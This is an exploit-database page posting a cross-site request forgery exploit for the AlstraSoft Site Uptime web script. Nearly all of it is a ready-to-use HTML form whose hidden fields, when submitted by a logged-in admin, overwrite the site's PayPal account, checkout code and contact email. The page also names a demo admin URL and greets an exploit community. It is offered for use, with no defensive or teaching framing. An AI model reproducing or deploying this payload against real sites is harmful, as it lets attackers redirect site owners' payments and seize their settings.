Home / exploits AlstraSoft Site Uptime Cross Site Request Forgery
Posted on 05 April 2012
# Exploit Title: AlstraSoft Site Uptime CSRF # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/alstrasoft-site-uptime/19680/ # Category:: webapps # Demo : http://www.blizsoft.com/uptime/admin # Greetz: Inj3ct0r Exploit DataBase 1337day.com <form name="frmCSet" action="commonsettings.php" method="get"> <input name="rbShowCount" value="Y" checked="" type="hidden"> <input name="rbShowCount" value="N" type="hidden"> <input name="act" id="act" value="Update" type="hidden"></td> <input name="txtpaypal" value="yourpaypalacc@paypal.com" type="hidden"></td> <input name="txtcheckout" value="g0002" type="hidden"> <input name="txtcontact" value="mail@mail.com" type="hidden"></td> <input name="btnUpdate" class="button" id="btnUpdate" value="Save Settings" type="submit"> <input name="BtnCancel" class="button" id="BtnCancel" value="Cancel" onclick="cancel();" type="hidden"></td> </form>
